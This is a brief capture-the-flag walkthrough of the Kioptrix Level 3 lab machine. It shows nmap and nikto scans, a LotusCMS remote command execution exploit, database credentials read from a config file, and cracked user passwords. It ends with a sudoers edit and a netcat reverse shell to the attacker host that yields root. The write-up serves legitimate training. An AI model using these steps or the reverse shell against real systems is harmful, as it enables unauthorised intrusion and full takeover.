Kioptrix Level 3

Infomation Gathing Nmap

nmap

root@kali:~# nmap -v -A -p1-65535 192.168.1.9
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-07 03:24 PST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:24
Completed NSE at 03:24, 0.00s elapsed
Initiating NSE at 03:24
Completed NSE at 03:24, 0.00s elapsed
Initiating NSE at 03:24
Completed NSE at 03:24, 0.00s elapsed
Initiating ARP Ping Scan at 03:24
Scanning 192.168.1.9 [1 port]
Completed ARP Ping Scan at 03:24, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:24
Completed Parallel DNS resolution of 1 host. at 03:25, 13.00s elapsed
Initiating SYN Stealth Scan at 03:25
Scanning 192.168.1.9 [65535 ports]
Discovered open port 22/tcp on 192.168.1.9
Discovered open port 80/tcp on 192.168.1.9
Completed SYN Stealth Scan at 03:25, 1.25s elapsed (65535 total ports)
Initiating Service scan at 03:25
Scanning 2 services on 192.168.1.9
Completed Service scan at 03:25, 6.03s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.9
NSE: Script scanning 192.168.1.9.
Initiating NSE at 03:25
Completed NSE at 03:25, 0.28s elapsed
Initiating NSE at 03:25
Completed NSE at 03:25, 0.01s elapsed
Initiating NSE at 03:25
Completed NSE at 03:25, 0.00s elapsed
Nmap scan report for 192.168.1.9
Host is up (0.00039s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:B9:F9:2B (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.013 days (since Sat Dec  7 03:06:51 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=199 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.39 ms 192.168.1.9

NSE: Script Post-scanning.
Initiating NSE at 03:25
Completed NSE at 03:25, 0.00s elapsed
Initiating NSE at 03:25
Completed NSE at 03:25, 0.00s elapsed
Initiating NSE at 03:25
Completed NSE at 03:25, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.89 seconds
           Raw packets sent: 65555 (2.885MB) | Rcvd: 65551 (2.623MB)
root@kali:~# 

Nikto

root@kali:~# nikto -h http://192.168.1.9
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.9
+ Target Hostname:    192.168.1.9
+ Target Port:        80
+ Start Time:         2019-12-07 03:25:32 (GMT-8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Server may leak inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun  5 12:22:00 2009
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7914 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2019-12-07 03:26:11 (GMT-8) (39 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Use Exploit.

LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit)                                                                 | exploits/php/remote/18565.rb

Get www-data privilege Get Phpmyadmin user and password
cat gconfig.php

 
 $GLOBALS["gallarific_mysql_server"] = "localhost";
 $GLOBALS["gallarific_mysql_database"] = "gallery";
 $GLOBALS["gallarific_mysql_username"] = "root";
 $GLOBALS["gallarific_mysql_password"] = "fuckeyou";

Get loneferret user privilege from phpmyadmin

1  dreg  0d3eccfb887aabd50f243b3f155c0f85   Mast3r
2  loneferret  5badcaf789d3d1d09794d8f021f40f0e starwars

admin n0t7t1k4

Use ht Try MysqlUDF.so --- Faild

select * from udftable into dumpfile '/usr/lib/lib_mysqludf_sys.so';
ERROR 1 (HY000) at line 2: Can't create/write to file '/usr/lib/lib_mysqludf_sys.so' (Errcode: 13)

Use ht

loneferret@Kioptrix3:~$ sudo ht
Error opening terminal: xterm-256color.
--------------------------
export TERM=xterm-basic

edit sudoers

add "loneferret ALL=(ALL) ALL" to /etc/sudoers file

reversv shell

loneferret@Kioptrix3:/etc$ cat /tmp/1.sh
#!/bin/sh
nc 192.168.1.7 999 -e /bin/sh
loneferret@Kioptrix3:/etc$ sudo /tmp/1.sh

Got Shell

root@kali:/usr/share/exploitdb/exploits/php/webapps# nc -nvlp 999
listening on [any] 999 ...
whoami
whoami
connect to [192.168.1.7] from (UNKNOWN) [192.168.1.9] 42260
root
root